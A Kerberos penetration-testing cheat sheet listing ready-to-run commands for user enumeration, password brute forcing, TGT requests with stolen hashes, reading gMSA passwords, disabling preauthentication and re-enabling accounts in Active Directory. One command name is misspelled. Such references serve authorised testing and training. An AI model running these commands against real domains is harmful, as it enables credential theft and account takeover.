# Kerberos Pentesting

An authentication protocol that is used to verify the identity of a user or host. It uses cryptography for authentication and is consisted of the client, the server, and the Key Distribution Center (KDC). A default port is 88. Kerberos also uses a 464 port for changing passwords.

### Enumeration <a href="#enumeration" id="enumeration"></a>

To enumerate automatically, you can use nmap.

```
nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local'-p 88 <target-ip>

# --dc: domain controller
# -d: domain
# combos.txt: the wordlist specified must be combinations with "username:password".
kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txt
# Users enumeration
kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txt
# Brute force user's password
kerbture bruteuser --dc 10.0.0.1 -d example.domain passwords.txt username
```

#### AS-REP Roasting <a href="#as-rep-roasting" id="as-rep-roasting"></a>

We might be able to find password hashes of user accounts that does not require preauthentication.\
Please see [AS-REP Roasting](https://exploit-notes.hdks.org/exploit/windows/active-directory/asrep-roasting/).

#### Kerberoasting Attack <a href="#kerberoasting-attack" id="kerberoasting-attack"></a>

If we have a password of some user, we might be able to gather another user credential.\
Please see [Kerberoasting Attack](https://exploit-notes.hdks.org/exploit/windows/active-directory/kerberoasting/).

#### Get TGT <a href="#get-tgt" id="get-tgt"></a>

```
impacket-getTGT -dc-ip <target-ip> example.local/<username>:<password>
# or
impacket-getTGT -dc-ip <target-ip> example.local/<username> -hashes <ntlm_hash>

# If a TGT found, set the environment variable for further testing
export KRB5CCNAME=<username>.ccache
```

If we get a TGT of some user, we can use it for login or further enumeration.

#### Get Password Hashes <a href="#get-password-hashes" id="get-password-hashes"></a>

```
# Get the password of the Group Managed Service Account (gMSA)
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -u username -p password get object 'gMSA01$' --attr msDS-ManagedPassword
# -k: Use Kerberos authentication
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k get object 'gMSA01$' --attr msDS-ManagedPassword
```

### Account Manipulation <a href="#account-manipulation" id="account-manipulation"></a>

If an user has permission to modify access control for another user, we can manipulate the configuration.

#### Disable Preauth <a href="#disable-preauth" id="disable-preauth"></a>

```
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -u username -p password add uac <username> -f DONT_REQ_PREAUTH
# -k: With Kerberos authentication
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k add uac <username> -f DONT_REQ_PREAUTH
```

If successful, an AS-REP Roasting attack could be used to obtain user password hashes.

#### Activate Accounts <a href="#activate-accounts" id="activate-accounts"></a>

If some users are disabled, we can activate them.

```
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k remove uac <username> -f ACCOUNTDISABLE
```